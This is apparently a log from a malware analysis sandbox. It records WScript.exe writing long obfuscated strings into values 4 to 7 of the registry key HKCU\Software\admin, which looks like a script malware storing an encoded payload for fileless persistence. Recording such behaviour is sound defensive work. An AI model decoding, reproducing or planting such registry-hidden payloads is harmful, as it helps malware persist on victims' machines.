pvvtwvvtivvtqtqtqtqtqtqrtvvtqtqtqtqtrvvtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqrtvvtqtqtqtqtqtrvvtqtqtqtqtqtivvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtivvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtivvtqtqtuvvtqtqtqtqtqtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtrvvtqtqtyvvtqtpvvtuvvtqtqtqtqrtvvtqtqrtvvtqtqtqtqtqtqrtvvtqtqrtvvtqtqtqtqtqtqtqtqtqtqrtvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtrvvtpvvtrvvtyvvtqtuvvtqtqtrvvtpvvtqtqtqtqtqtqtqtqtyvvtqtqtuvvtqtqiuvvtqtqrtvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtuvvtqtqtuvvtqtqtpvvtpvvtqtqtqtqtqtqtrvvtqtrvvttvvtqtuvvtqtqtwvvitvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtrvvtqtqtqtqtqtrvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtrvviuvvtovvtyvvtivvtuvvtovvtpvvtovvtyvvtqtqtqtqtqtqtovvtovvtqiivvtqtqtqtqtqtqrtvvtqtqtqtqrtvvtqtqtqtqtqtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtrvvtqtqtqtqtqtivvtqtrvviuvvtovvtrvvtivvtyvvtivvtwvvtovvtyvvtivvrtvvtqiuvvtyvvtqtyvvtqtuvvtqtqtqtqtrvvtqtqtqtqtqtqtqtqtivvtqtuvvtqtqtqtqtwvvtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqtyvvtqtrvviuvvtivvtyvvtivvtwvvtovvtyvvtivvrtvvtqtqtqtuvvtqtqiuvvtqtqtqtqtqtqttvvtqtqtuvvtqtqtqtqtqtivvtqtqtqtqtqtqtwvviwvvtqtuvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqitvvtqtrvviuvvtovvtrvvtovvttvvtovvtrvvtivvttvvtqtqtqtqtqtqiuvvtqtqrtvvtqtqtqtyvvtqtqtuvvtqtqtqtqtqtrvvtqtqtqtqtqtqtrvvtqtqtuvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqtyvvtqtrvviuvvtovvtrvvtivvtuvvtivvitvvtivviivvtivvttvvtqtqtqtqtpvvtpvvtqtqtqtqtqtqtqtqtuvvtqtqtuvvtqtqtqtqtqtrvvtqtqtqtqtqtqtrvvtrvvtqtuvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqtyvvtrvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtq | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 4 |
Value: tqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtuvvtuvvtpvvirvviuvvitvvtpvvttvvtovviyvvtqitvvtqtqtpvvirvvtuvvtuvvtqtpvvtuvvttvvtuvvtovvtpvvirvvttvviwvvtpvvirvvtuvviwvvtqtyvvtovvtivvtyvvtwvvtuvvtivvtpvvirvvtovvtuvvtwvvtqtrvvirvvtovvtuvvtwvvtyvvtpvviyvvtyvvtovvtqtwvvtqiivvirvvtivviivvtpvvtqiivvirvvtivvtyvvitvvttvviwvvtqtpvvtpvviyvvtqtyvvtwvvtsvvtqiivvirvvtivviyvvtpvvtqiivvirvvtivvtyvvtyvvtwvviwvvtqtpvvtpvvtpvvtyvvtyvvttvviwvvtqtpvvtpvvtpvvtyvvitvvtwvviwvvtqtpvvtqtrvvitvvtpvvtqiivvirvvtivvitvvtwvvtpvvirvvtyvviyvvtwvvtyvvtpvviwvvtyvvtyvvtwvvtqtqtpvvttvvtrvvtqtyvvtqiuvvtpvvtpvvtqtwvvtyvvtwvvtpvvttvvtivviyvvtqitvvtqtwvvtpvvtsvvtyvviyvvtwvvtyvvtovvtuvvitvvtovvtuvviuvvtpvvtsvvttvviwvvttvvttvvitvvtqtuvviivvtpvvtsvvtuvviwvvtqtyvvtuvvirvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvttvvtuvvtivvtpvvirvvtovvtuvvtqtpvvttvvttvvitvvtsvvtuvvtovvtpvvirvvitvvtwvvtpvvtsvvtqiuvvtpvvtsvvtyvviuvvtqtyvvtpvvtpvvtyvvtyvvttvvtqtqtpvvtyvvtqttvviyvvtqtqtqrtvvtqtovvitvviivvtyvvtpvvirvviyvvtsvvtpvvirvviivvtsvvttvvirvvtyvviyvvtwvvtqtpvvirvvtyvvtuvvtqitvvtwvvirvviyvvtrvvtrvvttvviyvvtwvvtqiivvirvvtivvtyvvitvvttvvtovvtqtpvvtqiivvirvvtivvtqtyvvtqtrvvtqttvvitvvtwvvtqttvvitvvttvvtqiivvirvvtivviyvvtpvvtpvviwvvtyvvtyvvttvvttvvtqtpvvtpvvtpvvtyvvtyvvttvvtovvtqtpvvtyvvtovvtpvvtpvvtyvvitvvttvvttvvtqtpvvtpvviyvvtyvviwvvtqtwvvtpvvtwvviivviivvtqtqtqrtvvtqtovvitvvitvviuvvtuvviivvtuvviuvvtuvvirvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvttvvttvviyvvtrvvtpvvttvvitvvtsvviivviivvttvvtsvvtuvvtuvvtqitvvtovviuvvtwvviuvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtqiivvirvvtivvtqtyvvttvvtrvvttvvttvvitvvtwvvitvvtwvviuvvtsvvtqtpvvtqiivvirvvtivvitvvtqttvvttvvtqitvvtpvvtuvvtqtqttvvtqtyvvtuvvtqtqtyvvtrvvttvvirvvtuvvtuvvtqitvvtovvitvviuvvtovvtuvviuvviivvtovviyvvtwvvtpvvirvvitvvtwvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvviivviivvtovvtuvvtqtpvvtivviwvvtqtqiivviivvtwvvtuvvtqtpvvtrvvtqtyvvtqtqtqtuvvtqiivviivvtwvvtuvvtqtyvvtrvvtqtyvvtqtqtqtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvviivviivvtovvtuvvtqtpvvtivviwvvtqtqiivviivvtwvvtuvvtqtpvvtrvvtqtyvvtqtqtqtuvvtqiivviivvtwvvtuvvtqtqtrvvtqtyvvtqtqtqtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvirvvtuvvtuvvtwvvtqtpvvirvvtyvvtuvvtqtpvvtuvvtivvtpvvirvviivvtqtpvvtuvviyvvtrvvtovvtyvvtwvvtrvvtuvvtovvtpvvirvvtovviyvvtqitvvtrvvirvviivvtpvvtpvviwvvtqitvvttvvtovvtpvvtpvvtqiuvvtyvvtivvtpvvttvviuvviwvvtqtwvvtovvtuvviivvtuvvtuvviivvtuvviuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvirvvtyvviyvvtqtpvvttvvttvvitvvtqttvvtpvvtqtwvvtovvtyvvtqtovvtyvvtqtyvvtwvvtpvvtqttvvtsvvtqtqtovvtuvviivvtsvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtuvvtivviuvvtpvviyvviuvviivviivviivviivviivviivvtuvvtsvvtpvvirvvitvvtpvviuvvirvvtqirvvtpvviyvvtwvvtyvvttvvtwvvtqiivvirvviuvvtqtrvvttvvirvvtyvvtuvvtqitvvtovvtyvvtqiwvvtpvvttvviuvvtsvvtqtwvvtovvtsvviivvtqttvvttvvitvvtqtuvviuvvtuvviyvvitvvttvvtpvvirvvitvvtrvviuvvirvviivvtsvvtuvvtuvvtpvvirvviuvvitvvtpvvttvviuvvitvvtwvvtpvvtpvvirvvtyvvtuvvtqtpvvtuvvttvvtpvvirvvtuvviyvvtqitvvtuvvtivvttvvttvviivvtivvtpvvtsvvtyvvtuvviuvvtpvvtuvvtovvtpvvtsvvtovvtuvviivvtyvvtpvvtsvvtovvtuvviivvtqtpvvtsvvtovvtuvviivvtpvvtpvvtsvvtovvtuvviivvitvvtpvvtsvvtovvtuvviuvvitvvttvvtsvvtovvtuvvtwvvtqtqiivvtpvviuvvtyvviyvvtqrtvvtqtpvviyvvtyvvtuvviuvvtpvvtivviwvvtqtwvvtuvvtqiuvvtpvvtuvvtq | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 5 |
Value: tqrtvvtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtqiivvtpvvtyvvtwvviuvvtqrtvvtqtivviwvvtqtwvvtuvvtqiuvvtpvvttvvirvvtqrtvvtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiivvtivviwvvtqtrvvtuvvtqiuvvtpvvtrvviwvvtqrtvvtqtpvvirvviivvtpvviuvvtsvvtpvvttvvtqtqtqtqtqtqtivviwvvtqtwvvtuvvtqiuvvtpvvtwvvirvvtqrtvvtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiyvvtivviwvvtqtrvvtuvvtqiuvvtpvvtqiwvvtqrtvvtqtpvviyvvtovvtpvvtqtyvviuvvirvvtivvtuvvtivviwvvtqtwvvtuvvtqiuvvtpvviivviyvvtqtqtqtqtqtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiyvvtivviwvvtqtrvvtuvvtqiuvvtpvviuvvitvvtqtqtqtqtqtqtpvviyvvtovvtpvvtqtpvviuvvirvvtyvvtovvtivviwvvtqtwvvtuvvtqiuvvtpvviyvviivvtqtqtqtqtqtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiyvvtivviwvvtqttvvtuvvtqiuvvtpvvitvviuvvtqtqtqtqtqtqtpvviyvvtovvtpvvtqitvviuvvirvvtrvvtsvvtivviwvvtqtwvvtuvvtqiuvvtpvvitvvrtvvtqtqtqtuvvtsvvtpvvtuvvitvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtsvvtovvtyvvtqiyvvtivviwvvtqtuvvtuvvtqiuvvtpvvirvvtqtqtqtqtqtqtqtpvviyvvtovvtpvvtwvvtyvviuvvirvvtqirvvtivviwvvtqtsvvtuvvtqiuvvtpvviwvvttvvtqtqtqtqtqtqtpvviyvvtovvtpvvttvvtyvvtuvvtsvvtuvvtsvvtpvviyvvtyvvtuvviuvvtpvvtivviwvvtqtyvvtuvvtqiuvvtpvvtsvvttvvtqtqtqtqtqtqtpvvttvvitvvtqtqtuvvtpvvtsvvtyvvtuvvtqitvvtuvvtsvvtuvvtsvvtpvvttvviivvtpvvtqtuvvtovviuvvtwvviwvvtuvvtqtpvviyvvtyvvtuvviuvvtpvvtuvvtqiuvvtpvvtovvitvvtqtqtqtqtqtqtpvvirvviyvvtqttvvttvvitvvtqtuvvtsvvtuvvtsvvtpvvirvvtyvviyvvtqitvvtyvvtqiyvvttvviuvvtqtqttvviyvvtqiuvvirvvtqiivvtpvviyvvtyvvtuvviuvvtpvvtivviwvvtqtivvtuvvtqiuvvtpvvtivvrtvvtqtqtqtuvvtsvvtuvvtsvvtpvvirvviyvvtqiivvtovviyvvtrvvtqttvviyvvtivvtovvtpvvtuvvtrvvtpvviwvvtqtyvvtwvviwvvtpvvtpvvtqtyvvtwvviuvvtpvviwvvtyvvtyvvtwvviwvvtqtwvvtpvvttvvitvvtrvvtqtrvvtpvvtpvvtyvvtyvvtwvviuvvtqtwvvtpvviwvvtqtyvvtwvviwvvtpvvtpvvtyvvtyvvtwvviuvvtqtrvvtpvvttvvitvvtivvtqttvvtpvvtuvviivviivvtovvtyvvtrvvtwvvtpvviyvvtyvvirvvtqtwvvtqttvvitvviwvvtpvviwvvtqtwvvtpvvtpvvtqtyvvtwvviuvvtyvvtivvtyvvtwvvtpvvttvviuvviivvtqtwvvtovvtuvviivvtyvviuvvirvvtqiuvvtivviwvvtqtpvvtuvvtqiuvvtpvvtwvviyvvtqtqtqtqtqtqtuvvtsvvtpvvtpvvtqtyvvtwvviuvvtyvvtivvtuvvtsvvttvvirvvtovvtuvvtwvvtqtqiivvtpvvitvvirvvttvviivviuvviivviivviivviivvtpvvirvvitvvtivvtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtpvvttvvitvvtpvviivviivviuvvirvviivvtyvvtuvvtuvvtpvvirvviuvvitvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtuvvtovvtpvvirvvtovviyvvtqitvvtpvvirvvtyvviuvvtwvvtyvvttvvirvvitvviivvtovviyvvtrvvtuvvtpvvirvvtqtivvtpvvirvvtuvvtivvtqtpvvtuvvttvvtpvvirvvtuvviuvvtwvvtqtqiivvirvvtivvtqtyvvtwvvtqiyvvttvviuvvtqtpvvttvvitvvtwvvtqtpvvtqirvviyvvtpvvtpvvtsvvtyvviuvvtwvvtyvvtpvvirvvtqtivvtyvvtrvvtpvvtsvvtuvviuvvtwvvtqtpvvtsvvtuvvtivvtqtpvvttvvirvvitvviivvtovvitvviuvvtuvvtuvvirvvtpvvirvvtuvvtivvtwvvtqtpvvirvvitvviivvtrvvtsvvtovviuvvtwvvtyvvtpvvirvvitvvtrvviyvvttvviivvtpvvtpvvtsvvtyvvtivvtwvvtqttvvttvvitvvtqtyvvtqiyvvttvviuvvtqtyvvtpvvtuvviivvtrvvttvvitvvtrvvtuvviuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtpvvirvvtyvviyvvtqtpvvtpvviyvvtuvvtwvvtqtwvvtpvviwvvtqtwvvtyvvtwvvtpvvtyvvitvvtqtovvtuvviivvtsvvtuvvttvvtrvvirvvitvviwvvtuvvtivvtuvvtovvtpvvtsvvtyvviyvviivvitvvtpvviyvvtovvtsvvtqtpvvtuvvtovviuvvtpvvtpvvtsvviivviyvviivviivviivviivviivviivvtovvtuvviivvitvvtpvvirvvtovvtuvvtqitvvtpvvirvviyvvtpvviivviivvtovvtuvvtqtpvvtpvviyvvtyvvirvvtqtyvvtpvvtsvvttvvttvvtuvvtwvviuvvtpvvtpvviwvviivviyvviivviivviivviivvtpvvirvvtyvvtuvviivvitvvtuvvtovvtuvvttvvtpvvtsvvtovvtyvvtqttvvtqtyvviuvvtpvvtwvviyvviivviyvviivviivviivviivvtuvvttvvtpvvirvviivvtqiuvvtpvvtyvvtivviivviyvviivviivviivviivvtpvvttvvitvvtyvvtwvvitvvtpvvirvvitvvtivvtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvttvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtuvvtovvtpvvirvvtyvvtivvtqtpvvtpvvirvvtwvviuvvtpvvttvvitvvtqtqtrvvtuvvtqiuvvtpvvttvviwvviivviyvviivviivviivviivvtqiivvirvvtivvtuvvtivvtqtyvvtpvvirvviivvtpvvtuvvtsvvttvvttvvitvvtsvvtpvvtsvvtyvviyvvtqtpvvttvvtsvvtyvviuvvtqtpvvtovviuvvtrvvtuvvtrvvirvviyvviivvtpvviyvvtqtyvvtwvvtwvvtqttvvitvviivvtsvvtsvviivvtovvtovviyvvtwvv | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 6 |
Value: tqtpvvirvvtyvvtuvvtqitvvtqiivvirvvtivvtwvvtyvvtqtrvvtpvviwvvtqtyvvtqirvvttvvtrvvitvvtrvvtpvvtpvvtqtwvvtpvvirvvtyvviyvvtqtpvvtyvvtwvvtpvvtsvvtyvviyvvtqtpvvttvvirvvtyvviuvvtqtpvvtovvitvviyvviyvvtpvvirvvtyvvtivvtqtpvvtpvvirvvtyvviyvvtwvvtpvvitvvtivvtqtyvvtqtovvtqtqtpvvirvvtyvvtivvtqtpvvitvvtivvtyvvtyvvttvvtpvvtqtwvvtqtqtpvvirvvtyvvtuvvtwvvtyvvtpvvtsvvttvvtpvvtpvvtuvvitvvtsvvtovvtyvvtqtuvvtpvvirvvtyvvtivvtqtpvvtpvvtsvvtqtwvvtuvviivvtuvviuvvirvvtqtqtwvvtuvvirvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvttvvtovviyvvtqtpvvtqtqtovvtyvvtqtivvtuvviyvviuvvtsvvirvvtovviivvitvviivviivviivviivvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtuvvtwvvtuvvttvvtuvvtivvtuvvtovvtpvvirvvtovviyvvtqtpvvirvviwvvtqirvvtqrtvvtqttvvttvviivvtivvtpvvirvvtyvvtovvttvvitvvtqiivvirvvtovvtyvvitvvttvvtpvvtwvvtpvvtivvtivvttvvirvvitvviwvvtovvtuvvtwvvttvvttvvtsvvtovvtyvvttvvtpvvtovvitvvtovvtyvvtrvvtsvvtpvvirvvtyvvtyvvttvvtpvvtovvtpvvtpvvtuvvitvvtqtovvtyvvtrvvtwvvtpvviyvvtwvvitvvttvvtpvviuvvirvvtwvviuvvirvviwvvtqirvvtqtrvvtqtqtqtqtivvtivvttvvirvvitvviwvvtovvtuvvtwvvtrvvttvvtsvvirvvtyvvttvvtpvvtpvvitvvtqtqtqtqtqtqtovvtyvvtqtsvvtpvvirvvtpvvtyvvttvvtpvvtpvvtpvvtqtqtqtqtqtqiuvvirvviyvvirvvtpvvirvviyvviuvvtpvvirvvtyvvttvvtrvvtyvvtpvvirvvtyvvirvvtrvvtqtqttvvitvvtovvtpvvtsvvtyvvtuvviivvitvvtqttvvitvviivvtpvvirvvtyvvttvvtwvvitvvtqttvvitvvtovvtpvvtsvvtyvviyvvtqtpvvtpvvtsvvtyvvtuvviivvtpvvttvvtsvvtovvttvvtwvvtpvvtovvtivvtwvvirvvtpvvirvvtqtyvvirvvtwvviivviivvtovvtuvvtwvvtqtqttvvitvvtovvtuvvtqiivviivvtuvvtuvvtqitvvtuvvtsvvtuvvtsvvtpvvtyvvitvvtqtovvtuvvtwvvtrvvtpvvirvvtyvviyvvtqtpvvtyvvtivvttvvirvvtovvttvvtwvvtpvvtovvtrvviuvvtuvvttvvttvvitvvtqtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvttvvtrvvitvvtsvvtpvvirvvtyvvtuvviivvitvvtqiivvirvvtovvtqtyvvtovvtqtovvtuvviuvvitvvtpvvirvvtyvviyvviivvtpvvtpvvirvvtqtyvvtpvvtwvvtqttvvitvvtovviuvvirvviuvvtyvvtuvvtuvvtpvvirvviuvvitvviwvvtwvvtivvitvvttvvtyvvtyvvtuvvtqtqtpvvtuvvitvvtqiivviivvtovvtuvvtqtpvvtqiivvtyvvtyvvtqtuvvtwvvtqtrvvtqtyvvtqtqtqiwvvttvvtivvitvvttvvtyvvtyvvtuvvtqtqiivviivviyvvtqtuvviyvvitvvttvvtuvvtivvtpvvirvvttvvtuvvtqtqttvvtyvvtyvvtuvvtqtqtpvvtwvviivviuvvtovvtqtqtrvvtqtqtqtqtqiivvtpvvitvvitvvtuvvtqtqtqtqtqtqtpvvtwvviivviuvvtovvtwvvtqtrvvtqtqtqtqtovvtuvvtqirvvtivvtpvvtovvtwvvtwvvtuvvtqtqtqtqiuvvtpvviuvvtsvvtqtqtqtqtqtqtuvvtsvvttvvttvviivvtivvtuvvttvvtpvvirvviyvvtivvirvvirvviivviivviivviivviivviivvtovviivvtpvvirvvtqitvvtsvvtuvvtovvitvvttvvtyvvtyvvtuvvtqtqttvvttvvtqitvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtrvvttvvitvvirvvttvvttvvtqitvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtpvvirvvitvvtwvviyvvtwvviuvvtsvvtpvvttvviuvvtqtqtwvvttvvttvvtqitvvtpvvtuvvtqtyvvttvvtyvvtyvvtuvvtqtqttvvttvvtqitvvtsvvtuvviwvvitvvttvviwvvtyvvtuvvtqtqtpvvtsvvtqitvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtyvvtrvvtpvvtwvviivviwvviuvvttvvtqtqtqtqtqtqtovvitvvitvvtyvvtpvvtwvviivviwvvtivviivvtqtrvvtqtqtqtqtovviyvvttvvtuvvtuvvtovvtpvviyvvttvvitvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtpvvirvvtqiivvttvvttvvtyvviivvtqtyvvtrvvttvvitvvirvvttvvttvvtqiivvtpvvirvvitvvtwvviyvvtwvviuvvtsvvtpvvttvviuvvtqtqtwvvtpvvirvvtqtyvvtpvvtuvvtqtyvvttvvtyvvtyvvtuvvtqtqttvvttvvtpvvtovvtovvtyvviivvitvviivviivviivviivvttvvttvvitvvtwvvtpvvtsvvtqtovvtpvvttvvitvvtovvtqtyvvtpvvtwvviivviivvttvvtyvvttvviuvvtyvvtuvvtqtqtovvitvviyvvtyvvtuvviivvtpvvirvvtqiyvvtovvtpvvttvvtyvvtyvvtuvvtqtqttvvttvvtqiyvvttvvtyvvttvviuvvtyvvtuvvtqtqtrvvttvvitvvirvvttvvttvvtqiyvvttvvtyvvttvviuvvtyvvtuvvtqtqtpvvirvvitvvtwvviyvvtwvviuvvtsvvtpvvttvviuvvtqtqtwvvtuvvirvvttvvttvvtqitvvtpvvtuvvtqtyvvttvvtyvvtyvvtuvvtqtqttvvttvvtqiyvviwvvtpvvttvviwvvtyvvtuvvtqtqtpvvtsvvtqiyvvttvvtyvvttvviuvvtyvvtuvvtqtqtpvvirvvtqitvvirvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtpvvirvvitvvtwvvitvvtwvviuvvtpvvtqirvvtyvvtivvttvvttvvitvvtpvvtpvvtsvvttvvtuvvtqtqttvvtyvvtyvvtuvvtqtqtpvvirvvitvvtwvvtrvvtuvviwvviyvvtuvvtpvvttvviwvviivviivvitvvtwvviuvvtqtqtovvttvvttvvitvvtpvvtpvvirvvitvvtwvvtrvvtuvvtpvvitvviyvviivviivviivviivviivvitvvtwvviuvvtqtqiivvttvvttvvitvvtpvvtpvvirvvitvvtwvvitvvtwvviuvvtpvvtwvvtrvvttvvttvvitvvtwvvtuvviuvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvv | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 7 |
Value: irvvtyvvtuvvtqtpvvttvvttvviyvvtrvviwvvttvvtovvtpvvttvvtyvvtyvvtuvvtqtqtyvvtrvvtpvvirvvtqtyvvtsvvtuvvtovvtyvvttvvtyvvtyvvtuvvtqtqtpvvirvvitvvtpvvitvvtwvviuvvtsvvtwvviuvvttvvttvvitvvtpvvtivvtsvvitvvtwvvtivvtuvvtpvvtsvvtqtovvtivvitvvtqttvvitvvtrvvtpvvtsvvtqtyvvtsvvtuvvtovvtpvvttvvtyvvtyvvtuvvtqtqtyvvtrvvtpvvtwvviivviwvvtovvtqtqtrvvtqtqtqtqtovvitvviyvviwvvtpvvtsvvtwvvtuvvtqtqttvvtyvvtyvvtuvvtqtqtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvviivviivvttvvtuvvtqitvvttvvtyvvtyvvtuvvtqtqiivviivvtovvtuvvtqtpvviuvvtpvvtqttvviivviyvviivviivviivviivvtuvvtsvvtuvvtsvvtpvvirvvtyvviyvvtqitvvttvvirvvtqtyvvtpvviyvvtwvvtqttvvtyvvtyvvtuvvtqtqtqiivvtsvvtyvvitvvtqtuvviyvvitvvttvviuvvtsvvirvvirvviivviyvviivviivviivviivvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtpvvttvvtivvtuvviivvitvvtqtqtpvviyvvtyvvtuvviivvitvvtivviwvvtqtqtuvvtqtpvvirvvtyvvtuvvtqtpvvtivviwvvtrvvtqitvvtwvviuvvtqtqtyvvtqtuvvttvvtpvvttvvtyvvtyvvtuvvtqtqtivvtpvvtwvvtpvvttvvtyvvtyvvtuvvtqtqtuvvtqiuvvtpvvtrvvtwvviivviyvviivviivviivviivvtpvvirvvtyvvtuvviivvitvvtpvvttvvitvvtyvvtwvvtyvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvttvviuvvitvvtrvvtqiivviivvtwvvtuvvtwvvtpvvtrvvtqtyvvtqtqtqtuvvtqiuvvtpvvtuvvirvviivviivviivviivviivviivvtuvvtsvviuvvtpvvtyvvtovviivviuvviivviivviivviivvtivviwvvtwvvtyvvttvvttvviyvvtrvvitvvtivvtyvvtuvviuvvtqtqtqtuvvtsvviivvtovviivvtwvvtpvvttvvitvvtrvvtqiuvvtpvvtsvvtuvvtuvviuvvtyvvtpvviyvvtyvvtuvviuvvtqtuvvtqiuvvtpvviivvtovvtqtqtqtqtqtqtuvvtsvvtpvvtyvvitvvtqtovvtuvviivvtrvvtivviwvvtqtqiivviivvtwvvtuvvtwvvtyvvtrvvtqtyvvtqtqtqitvvitvvtuvvtuvvtpvvirvviuvvitvvtpvvtwvviuvvitvvtwvvtyvvtqrtvvtqtuvvttvvtuvvtivvtuvvtovvirvviuvvirvvtivvtqtrvvtqtuvvtqtqtuvvtivviuvvtpvvtwvvtwvviivviwvviivviivviivviivvtuvvtivvtpvvirvviyvvtpvvtivvtpvvtivvtqtrvvtqtyvvtqtqtqtuvvttvviuvvtpvvtwvviwvviivviwvviivviivviivviivvtpvvttvvitvvtyvvtwvvtqirvvtpvvitvviyvvtqtqtqtqtqtqttvvttvvitvvtsvvtqttvvitvvtwvvtpvvttvviuvvtqtwvviivvtqiivvirvvtivvtpvvtqtyvvtqtrvvtqtyvvtqtqtqttvvtqtqtyvvtwvvtsvvtyvvtwvvttvvirvvitvviuvvtovvitvviuvvitvvtivviwvvtrvvtqtpvviyvvtpvvtuvviuvvitvviiv